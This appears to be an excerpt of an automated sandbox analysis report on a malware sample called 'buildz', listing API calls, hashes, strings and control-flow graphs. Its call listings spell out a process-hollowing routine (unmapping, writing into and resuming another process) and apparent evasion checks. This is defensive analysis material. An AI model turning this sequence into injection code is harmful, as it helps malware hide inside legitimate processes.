                          • Instruction ID: 22f00a8a4e9c5ef077834ca32b92b4faf8c27c19e33e614236c98f918c04012a
                          • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                          • Instruction Fuzzy Hash: 5CF0E578694750A6F71177A0BC367857D917B32B09F104044E1142E2E5D3FD234CA799
                          APIs
                          • std::exception::exception.LIBCMT ref: 022CFBF1
                            • Part of subcall function 022B169C: std::exception::_Copy_str.LIBCMT ref: 022B16B5
                          • __CxxThrowException@8.LIBCMT ref: 022CFC06
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                          • String ID: TeM$TeM
                          • API String ID: 3662862379-3870166017
                          • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                          • Instruction ID: 0a3b58b85b3182ac6d9200aa26d72de94dd3e0c12a5b4f56f8ed455ccd7493cd
                          • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                          • Instruction Fuzzy Hash: 06D06775C0030CBBCF05EFA5D459CDDBBB9AE04384B408466A91897245EA74A3598F94
                          APIs
                            • Part of subcall function 022A197D: __wfsopen.LIBCMT ref: 022A1988
                          • _fgetws.LIBCMT ref: 0228D15C
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __wfsopen_fgetws
                          • String ID:
                          • API String ID: 853134316-0
                          • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                          • Instruction ID: 82d7224335f503f8d2d0c5c8e88d20c56b538571b51cf539ce9dca600254ab08
                          • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                          • Instruction Fuzzy Hash: 6F91A371D213169BCF20EFE4C844BAEB7B5AF04314F140529E815A76C9E7B5EA18CB92
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _malloc$__except_handler4_fprintf
                          • String ID:
                          • API String ID: 1783060780-0
                          • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                          • Instruction ID: 34752b4d417fd5ddd9c54484898a088b5200fe72f5aacebab7e75aaeae6c64db
                          • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                          • Instruction Fuzzy Hash: A6A15BB1C10348EBEF11EFE4C855BEEBB76AF14308F140128D4057A2D5D7B69A58CBA6
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                          • String ID:
                          • API String ID: 2974526305-0
                          • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                          • Instruction ID: b273739a7052136a20b5baed69eccc3d2ae3b8696266f3408e69ccf464e35dd7
                          • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                          • Instruction Fuzzy Hash: F8519470A21306DBDB248FF989A476EB7B6BF40324F148B29EC3596AD8D7709950CF40
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                          • Instruction ID: 13b8f63246620e74bf7ab0310386765a59f320d2bfc88e573b30167bfc0340ba
                          • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                          • Instruction Fuzzy Hash: 29017E3206014ABBCF125EC4CC02CED3F63BF18348B688619FA1C59539D336C5B1AB81
                          APIs
                          • ___BuildCatchObject.LIBCMT ref: 02347A4B
                            • Part of subcall function 02348140: ___BuildCatchObjectHelper.LIBCMT ref: 02348172
                            • Part of subcall function 02348140: ___AdjustPointer.LIBCMT ref: 02348189
                          • _UnwindNestedFrames.LIBCMT ref: 02347A62
                          • ___FrameUnwindToState.LIBCMT ref: 02347A74
                          • CallCatchBlock.LIBCMT ref: 02347A98
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                          • String ID:
                          • API String ID: 2901542994-0
                          • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                          • Instruction ID: 581b693785c4f15d059d15e03b9e579981a1a72d03b37b7d319bd44d09cbd314
                          • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                          • Instruction Fuzzy Hash: 2401D732100109BBCF22AF55CD01EEA7BBAEF49758F158055FD1865221DB32E961DFA0

                          Execution Graph

                          Execution Coverage:1.2%
                          Dynamic/Decrypted Code Coverage:97.5%
                          Signature Coverage:0%
                          Total number of Nodes:40
                          Total number of Limit Nodes:7
                          execution_graph 32051 2300000 32054 2300630 32051->32054 32053 2300005 32055 230064c 32054->32055 32057 2301577 32055->32057 32060 23005b0 32057->32060 32061 23005dc 32060->32061 32062 23005e2 GetFileAttributesA 32061->32062 32063 230061e 32061->32063 32065 2300420 32061->32065 32062->32061 32066 23004f3 32065->32066 32067 23004fa 32066->32067 32068 23004ff CreateWindowExA 32066->32068 32067->32061 32068->32067 32069 2300540 PostMessageA 32068->32069 32070 230055f 32069->32070 32070->32067 32072 2300110 VirtualAlloc GetModuleFileNameA 32070->32072 32073 2300414 32072->32073 32074 230017d CreateProcessA 32072->32074 32073->32070 32074->32073 32076 230025f VirtualFree VirtualAlloc Wow64GetThreadContext 32074->32076 32076->32073 32077 23002a9 ReadProcessMemory 32076->32077 32078 23002e5 VirtualAllocEx NtWriteVirtualMemory 32077->32078 32079 23002d5 NtUnmapViewOfSection 32077->32079 32080 230033b 32078->32080 32079->32078 32081 2300350 NtWriteVirtualMemory 32080->32081 32082 230039d WriteProcessMemory Wow64SetThreadContext ResumeThread 32080->32082 32081->32080 32083 23003fb ExitProcess 32082->32083 32085 814000 32086 814017 32085->32086 32089 814026 32086->32089 32090 814035 32089->32090 32093 8147c6 32090->32093 32094 8147e1 32093->32094 32095 8147ea CreateToolhelp32Snapshot 32094->32095 32096 814806 Module32First 32094->32096 32095->32094 32095->32096 32097 814815 32096->32097 32099 814021 32096->32099 32100 814485 32097->32100 32101 8144b0 32100->32101 32102 8144c1 VirtualAlloc 32101->32102 32103 8144f9 32101->32103 32102->32103 32103->32103

                          Control-flow Graph

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02300156
                          • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0230016C
                          • CreateProcessA.KERNELBASE(?,00000000), ref: 02300255
                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02300270
                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02300283
                          • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0230029F
                          • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 023002C8
                          • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 023002E3
                          • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02300304
                          • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0230032A
                          • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02300399
                          • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 023003BF
                          • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 023003E1
                          • ResumeThread.KERNELBASE(00000000), ref: 023003ED
                          • ExitProcess.KERNEL32(00000000), ref: 02300412
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                          • String ID:
                          • API String ID: 93872480-0
                          • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                          • Instruction ID: dde965f4710aeedd1efc13954f472dff456d74eb49abff6917f13caa577c6451
                          • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                          • Instruction Fuzzy Hash: 8AB1C674A00208AFDB44CF98C895F9EBBB5FF88314F248158E949AB391D771AE41CF94

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 15 2300420-23004f8 17 23004fa 15->17 18 23004ff-230053c CreateWindowExA 15->18 19 23005aa-23005ad 17->19 20 2300540-2300558 PostMessageA 18->20 21 230053e 18->21 22 230055f-2300563 20->22 21->19 22->19 23 2300565-2300579 22->23 23->19 25 230057b-2300582 23->25 26 2300584-2300588 25->26 27 23005a8 25->27 26->27 28 230058a-2300591 26->28 27->22 28->27 29 2300593-2300597 call 2300110 28->29 31 230059c-23005a5 29->31 31->27
                          APIs
                          • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02300533
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateWindow
                          • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                          • API String ID: 716092398-2341455598
                          • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                          • Instruction ID: 3a11691df401d185cc51b8936025df5dd94ea5eac4e5d6f1816823ae403e31fe
                          • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                          • Instruction Fuzzy Hash: C5513870D08388DAEB15CBE8C858BEDBFB6AF11708F144058D5443F2C6C7BA5658CB62

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 32 23005b0-23005d5 33 23005dc-23005e0 32->33 34 23005e2-23005f5 GetFileAttributesA 33->34 35 230061e-2300621 33->35 36 2300613-230061c 34->36 37 23005f7-23005fe 34->37 36->33 37->36 38 2300600-230060b call 2300420 37->38 40 2300610 38->40 40->36
                          APIs
                          • GetFileAttributesA.KERNELBASE(apfHQ), ref: 023005EC
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID: apfHQ$o
                          • API String ID: 3188754299-2999369273
                          • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                          • Instruction ID: 4723552f3ae229f6d068742418945b1fba1bf4f70b62a44a9f3bbe2f2463230a
                          • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                          • Instruction Fuzzy Hash: 0A011E70C0425CEADB14DBD8C5583EEBFB5AF41308F188099C4592B282D7769B58CBA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 41 8147c6-8147df 42 8147e1-8147e3 41->42 43 8147e5 42->43 44 8147ea-8147f6 CreateToolhelp32Snapshot 42->44 43->44 45 814806-814813 Module32First 44->45 46 8147f8-8147fe 44->46 47 814815-814816 call 814485 45->47 48 81481c-814824 45->48 46->45 51 814800-814804 46->51 52 81481b 47->52 51->42 51->45 52->48
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008147EE
                          • Module32First.KERNEL32(00000000,00000224), ref: 0081480E
                          Memory Dump Source
                          • Source File: 00000005.00000002.2523332173.0000000000814000.00000040.00000020.00020000.00000000.sdmp, Offset: 00814000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_814000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFirstModule32SnapshotToolhelp32
                          • String ID:
                          • API String ID: 3833638111-0
                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                          • Instruction ID: 5936b068f8260bbdcf20a4bf5107cba508bcb27af3018b0ca9546d85a85c3584
                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                          • Instruction Fuzzy Hash: B2F062352007156FD7203BF9A88DBAA76ECFF49725F101629E646E24C1DB70E8854661

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 54 814485-8144bf call 814798 57 8144c1-8144f4 VirtualAlloc call 814512 54->57 58 81450d 54->58 60 8144f9-81450b 57->60 58->58 60->58
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008144D6
                          Memory Dump Source
                          • Source File: 00000005.00000002.2523332173.0000000000814000.00000040.00000020.00020000.00000000.sdmp, Offset: 00814000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_814000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                          • Instruction ID: 0c326858b60c95c24e9a1c0bb34ccaa771767d9d0fddbdc35f03af7f684d6213
                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                          • Instruction Fuzzy Hash: 67113C79A00208EFDB01DF98C985E99BBF5EF08750F058094F9489B362D371EA90DF80

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 555 2326437-2326440 556 2326442-2326446 555->556 557 2326466 555->557 556->557 558 2326448-2326459 call 2329636 556->558 559 2326468-232646b 557->559 562 232645b-2326460 call 2325ba8 558->562 563 232646c-232647d call 2329636 558->563 562->557 568 2326488-232649a call 2329636 563->568 569 232647f-2326480 call 232158d 563->569 574 23264ac-23264cd call 2325f4c call 2326837 568->574 575 232649c-23264aa call 232158d * 2 568->575 572 2326485-2326486 569->572 572->562 584 23264e2-2326500 call 232158d call 2324edc call 2324d82 call 232158d 574->584 585 23264cf-23264dd call 232557d 574->585 575->572 594 2326507-2326509 584->594 590 2326502-2326505 585->590 591 23264df 585->591 590->594 591->584 594->559
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                          • String ID:
                          • API String ID: 1442030790-0
                          • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                          • Instruction ID: 4d04e4193d3ae2867de80ab66e099c73c84c4059a763ca1052cacf3a1d6a1527
                          • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                          • Instruction Fuzzy Hash: 7B21C331204630EEEB317F65ED02E1B7BDEDF41B60F608029E5C9554A5EB628A58CF50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 599 2323f16-2323f2f 600 2323f31-2323f3b call 2325ba8 call 2324c72 599->600 601 2323f49-2323f5e call 232bdc0 599->601 608 2323f40 600->608 601->600 607 2323f60-2323f63 601->607 609 2323f77-2323f7d 607->609 610 2323f65 607->610 613 2323f42-2323f48 608->613 611 2323f89-2323f9a call 2330504 call 23301a3 609->611 612 2323f7f 609->612 614 2323f67-2323f69 610->614 615 2323f6b-2323f75 call 2325ba8 610->615 623 2323fa0-2323fac call 23301cd 611->623 624 2324185-232418f call 2324c9d 611->624 612->615 616 2323f81-2323f87 612->616 614->609 614->615 615->608 616->611 616->615 623->624 629 2323fb2-2323fbe call 23301f7 623->629 629->624 632 2323fc4-2323fcb 629->632 633 232403b-2324046 call 23302d9 632->633 634 2323fcd 632->634 633->613 641 232404c-232404f 633->641 635 2323fd7-2323ff3 call 23302d9 634->635 636 2323fcf-2323fd5 634->636 635->613 644 2323ff9-2323ffc 635->644 636->633 636->635 642 2324051-232405a call 2330554 641->642 643 232407e-232408b 641->643 642->643 652 232405c-232407c 642->652 646 232408d-232409c call 2330f40 643->646 647 2324002-232400b call 2330554 644->647 648 232413e-2324140 644->648 655 23240a9-23240d0 call 2330e90 call 2330f40 646->655 656 232409e-23240a6 646->656 647->648 657 2324011-2324029 call 23302d9 647->657 648->613 652->646 665 23240d2-23240db 655->665 666 23240de-2324105 call 2330e90 call 2330f40 655->666 656->655 657->613 662 232402f-2324036 657->662 662->648 665->666 671 2324113-2324122 call 2330e90 666->671 672 2324107-2324110 666->672 675 2324124 671->675 676 232414f-2324168 671->676 672->671 679 2324126-2324128 675->679 680 232412a-2324138 675->680 677 232416a-2324183 676->677 678 232413b 676->678 677->648 678->648 679->680 681 2324145-2324147 679->681 680->678 681->648 682 2324149 681->682 682->676 683 232414b-232414d 682->683 683->648 683->676
                          APIs
                          • _memset.LIBCMT ref: 02323F51
                            • Part of subcall function 02325BA8: __getptd_noexit.LIBCMT ref: 02325BA8
                          • __gmtime64_s.LIBCMT ref: 02323FEA
                          • __gmtime64_s.LIBCMT ref: 02324020
                          • __gmtime64_s.LIBCMT ref: 0232403D
                          • __allrem.LIBCMT ref: 02324093
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023240AF
                          • __allrem.LIBCMT ref: 023240C6
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023240E4
                          • __allrem.LIBCMT ref: 023240FB
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02324119
                          • __invoke_watson.LIBCMT ref: 0232418A
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                          • String ID:
                          • API String ID: 384356119-0
                          • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                          • Instruction ID: df39934c1efdfe439d4b6390038964c4038c666f2a8a28de3dc8e5c5e625b4e9
                          • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                          • Instruction Fuzzy Hash: 18710971A00736BBE724DE79DC40B6AB7B9BF00724F144279E614E7680E774EA488BD0

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                          • String ID:
                          • API String ID: 3432600739-0
                          • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                          • Instruction ID: a89b83a3709e5c93414ddfbc2b2377db88e14970bf8ff66fb396cfc66e0d45a2
                          • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                          • Instruction Fuzzy Hash: 12412432904324AFDB20EFA4DD82B9E7BEEEF44314F20442DEA1496190DB75964CDF61

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 748 23284ab-23284d9 call 2328477 753 23284f3-232850b call 232158d 748->753 754 23284db-23284de 748->754 761 2328524-232855a call 232158d * 3 753->761 762 232850d-232850f 753->762 755 23284e0-23284eb call 232158d 754->755 756 23284ed 754->756 755->754 755->756 756->753 773 232856b-232857e 761->773 774 232855c-2328562 761->774 763 2328511-232851c call 232158d 762->763 764 232851e 762->764 763->762 763->764 764->761 779 2328580-2328587 call 232158d 773->779 780 232858d-2328594 773->780 774->773 775 2328564-232856a call 232158d 774->775 775->773 779->780 782 23285a3-23285ae 780->782 783 2328596-232859d call 232158d 780->783 785 23285b0-23285bc 782->785 786 23285cb-23285cd 782->786 783->782 785->786 789 23285be-23285c5 call 232158d 785->789 789->786
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ExitProcess___crt
                          • String ID:
                          • API String ID: 1022109855-0
                          • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                          • Instruction ID: 837b4411eaa332a888dbae440fe846f4365b02cf5bf780fc3f29dd1ac32affc0
                          • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                          • Instruction Fuzzy Hash: 0531C131900674DFCB21AF14FC8088977AEFF14324725866AE948572B0CBF569CDAFA4
                          APIs
                          • std::exception::exception.LIBCMT ref: 0234FC1F
                            • Part of subcall function 0233169C: std::exception::_Copy_str.LIBCMT ref: 023316B5
                          • __CxxThrowException@8.LIBCMT ref: 0234FC34
                          • std::exception::exception.LIBCMT ref: 0234FC4D
                          • __CxxThrowException@8.LIBCMT ref: 0234FC62
                          • std::regex_error::regex_error.LIBCPMT ref: 0234FC74
                            • Part of subcall function 0234F914: std::exception::exception.LIBCMT ref: 0234F92E
                          • __CxxThrowException@8.LIBCMT ref: 0234FC82
                          • std::exception::exception.LIBCMT ref: 0234FC9B
                          • __CxxThrowException@8.LIBCMT ref: 0234FCB0
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                          • String ID: leM
                          • API String ID: 3569886845-2926266777
                          • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                          • Instruction ID: f43fc1865941fd753d7140b3345864147870079a46477a9a22cbb5bee39e8570
                          • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                          • Instruction Fuzzy Hash: 1011C879D0020DBBCF01FFA5D855CEEBBBDAA04344F408566AD5897641EB74A3488F98
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free_malloc_wprintf$_sprintf
                          • String ID:
                          • API String ID: 3721157643-0
                          • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                          • Instruction ID: 82de848df33744feebd65ffdaf7e4bf847234a771fc70b61cd0d0b6a4bed3684
                          • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                          • Instruction Fuzzy Hash: 141103B29006747AC371A6B55C11FFF7BED9F46702F0800A9FE8CD1180EB599A089BB1
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw$_memset$_malloc_sprintf
                          • String ID:
                          • API String ID: 65388428-0
                          • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                          • Instruction ID: 537a21c2d57bdce6c7d175abb47921a432332635c1d29f62593d2f683bb60d0b
                          • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                          • Instruction Fuzzy Hash: C0515E71D40219ABDB21DBA5DC86FEFBBB9FF04744F100025FA49F6180E7745A058BA5
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw$_memset_sprintf
                          • String ID:
                          • API String ID: 217217746-0
                          • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                          • Instruction ID: 5401647b95717ee53d2607edacc39d99ab60561b11672bb6c2907375101510ab
                          • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                          • Instruction Fuzzy Hash: BE514FB1E40209ABDF21DFA1DC86FEEBB79EB04704F104125F905B61C0DB75AA058BA5
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw$_memset_sprintf
                          • String ID:
                          • API String ID: 217217746-0
                          • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                          • Instruction ID: 723db05ae31e14bc4418a458894aa3b6661173fb2573e3fef75eb87eb9bea4a5
                          • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                          • Instruction Fuzzy Hash: A7514171E40209ABDF21DFA1DC86FEEBBB9FB04704F100129F905B61C0DB746A058BA4
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                          • String ID:
                          • API String ID: 3534693527-0
                          • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                          • Instruction ID: f4db5351779bc127a72a1f5058c4d98111b8a3d3c891ab86561906bcbd7ae7d1
                          • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                          • Instruction Fuzzy Hash: DA31D272A00235ABDB316B689C00B6F77D99F05B68F114495FE04FB284DF74B545CBA1
                          APIs
                          • __getptd_noexit.LIBCMT ref: 023C66DD
                            • Part of subcall function 023259BF: __calloc_crt.LIBCMT ref: 023259E2
                            • Part of subcall function 023259BF: __initptd.LIBCMT ref: 02325A04
                          • __calloc_crt.LIBCMT ref: 023C6700
                          • __get_sys_err_msg.LIBCMT ref: 023C671E
                          • __invoke_watson.LIBCMT ref: 023C673B
